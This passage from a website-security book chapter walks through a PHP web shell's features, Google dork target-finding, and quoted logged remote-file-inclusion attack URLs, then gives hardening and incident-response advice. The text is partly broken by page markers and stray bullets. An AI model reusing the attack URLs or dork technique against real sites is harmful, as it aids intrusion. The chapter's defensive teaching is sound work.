Zooming in on the tool bar, we see that the shell has several options listed under it:Selecting the FTP Quick brute will work to break the passwords on the site.. Once this shell is inse
Trang 1Zooming in on the tool bar, we see that the shell has several options listed under it:
Selecting the FTP Quick brute will work to break the passwords on the site Once this
shell is inserted, possibly through a Trojan horse, the "owner" of the shell can break
passwords and log in normally, thus avoiding any nastiness with log files showing
weird traffic Though he or she could easily wipe out the log files with this tool:
Next, you can learn all about the server, what hardware is running, and what the
OS build, version, and patch levels are One note: You will see that Open Base Dir
is OFF (not secure) This is one way an attacker could enter the site Remember our
PHP settings? Here is an example where the shell is reporting the server security
information This information was obtained with one of the scanning scripts that
report information about your environment:
Trang 2What shell would be complete without its own ability to connect to your SQL server?
The next screenshot is the Execution PHP-code box The attacker can run PHP The attacker can run PHP
commands through this, perhaps as a launching off point to attack another site The
IP would resolve back to your server, not theirs
The real power of the command shell is shown in the following screenshot It has
a built-in list of commands ready to execute Note the passwords, commands,
writeable files and folders, configuration files, and more:
Trang 3This shell has a very handy browsing tool, giving the perpetrator the ability to add,
or delete, or change files It can browse all the way to the top root of the server
You can see that the Perms column gives you the ability to change any file or
directory permission:
My favorite part of this shell, (Warning: This is humor), is the following screenshot
These guys take their craft so seriously that they ask for feedback on the shell or hack
and bugs
Trang 4But developers of legitimate commercial or open-source applications should also
take their craft seriously to avoid instances of hacking
I have examined the source code of this and I can tell you this is a well-written and a
Trang 5The next part that follows is this.
Trang 6Then the following details are displayed.
Details about Databases and Net are shown in the following section of the
original screenshot
Trang 7The reason I have spent time showing you the shells is to make you aware of the
danger lax security represents
Finding Targets to Attack
A "Dork" is a Google search to locate targets Those targets can be simply a specific
version of an extension or a device such as a webcam on a specific port
Let us say a bad guy finds out that the extension is vulnerable from one of the
many exploits or responsible disclosure sites He or she could Google all the targets
like this:
inurl:"/com_example/"
In this example, the com_example would be the extension you are searching for
Once this search is run, it will yield a lovely list of targets
This sort of thing happens every time a new exploit is reported Everyone rushes out
to try and break into your site You want to watch your logs such as this:
http://www.yourdomain.com/index.php?option=com_noticias&Itemid=xcorpitx&t
ask=detalhe&id=http://www.XXXXXX.net/3333/read/test.txt??
/?mosConfig_absolute_path=http://xxxxx.yyyyyyyyyyy.pt/test.txt?
/poll/comments.php?id=%7B$%7Binclude($aaa)%7D%7D%7B$%7Bexit()%7D%7
D&ddd=http
These are three examples of recent attacks against a client's domain that I pulled
out for this chapter The top one is a common attack The test.txt is meant to
test your server and pull out variables to help them determine weaknesses If your
site is strengthened and properly configured using htaccess and the other tools
mentioned, it should dramatically lower the potential effect of this particular threat
on your sites
Trang 8What Do I Do Then?
First assess your own security as much as you can Hire a professional to check your
security after you're through If you want to use the tools we discussed earlier in this
chapter to protect and monitor yourself, a good place to start is your local library or
book store, and the Internet
Educate yourself in these key areas:
Networking
DNS
Very rudimentary TCP or IP
Apache common log file format
Basic PHP commands
.htaccess includes
php.ini includes
The tools listed:
NMAP Wireshark Basic Linux commandsLinux commands
Hacker (read: the bad guys) sitese bad guys) sites
Sites such as CERT.ORG
You will need to learn to have patience because as you start finding issues, you
will want your host to fix them They typically do not like interference and may get
upset Again, do not try anything in this chapter without the express permission of
the owner of the computer, host, network, or website
•
•
•
•
•
•
•
•
°
°
•
•
•
Trang 9Ensure that your host is at the latest patch levels for OS and the associated
moving parts such as Apache, OpenSSL, MySQL (version dependent),
and PHP
Set your permissions as tightly as possible
Fine-tune your site through htaccess and php.ini
If you allow uploads, limit the size and sequester them for testing
Check your log files frequently
Block specific countries that are known to be havens for attacks, IF you do
not need traffic from those countries See the final chapter in this book for a
good way to find this information
Have an excellent disaster recovery and business continuity plan for
your site
Back up tapes or CDs of your applications and data
License keys or serial numbers
Get the secondary host set up and ready
Consider Virtual Private Servers, as they help by protecting you from other
shared hosts
Block nuisance IP addresses
Keep apprised of the latest techniques that are being used to break into sites
If you note ANY suspicious behavior from your website, contact your host
and report a potential security incident
But What If My Host Won't Cooperate?
Get a new host It is that simple Hosts are a dime a dozen and quite a few of them
operate as if they don't care, and I have seen my share They might have grown too
fast, they might be resellers of larger hosting operations, they might not share your
'technical opinion' So what? Get another host and be done with it
What If My Website Is Broken into and
Defaced?
First, assess the damage
IMMEDIATELY make copies of all the logs you can find and remove the
copy from the server This could be useful for law enforcement reasons
Ensure that you have a backup Now would be a good time for a
full restoration
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
Trang 10Contact your host and inform them of the "incident" If the tech is
uncooperative, or tells you that it's your fault, ask for his or her supervisor
and keep trying till you find someone who can help you out
If you don't have a backup, then:
Check every file's permission
Check every index.php and index.htm or index.html for stuff that does not belong
Check for odd or increased traffic
Ask your host to run netstat and other tools to see if there are any processes running that should not be
Consider rebuilding the site from scratch, including removal
of the old hosting account Yes, it is that important
What If a Rootkit Has Been Placed on My
Server?
This is a vitally important issue You will want to do a few things first:
IMMEDIATELY obtain a full backup and understand that it may be full of
viruses This will help with the forensics and legal issues
Attempt to locate the rootkit It may be known by several names:
C99.php German.php Arab.php R57.php Tst.txt
•
•
°
°
°
°
°
•
•
°
°
°
°
°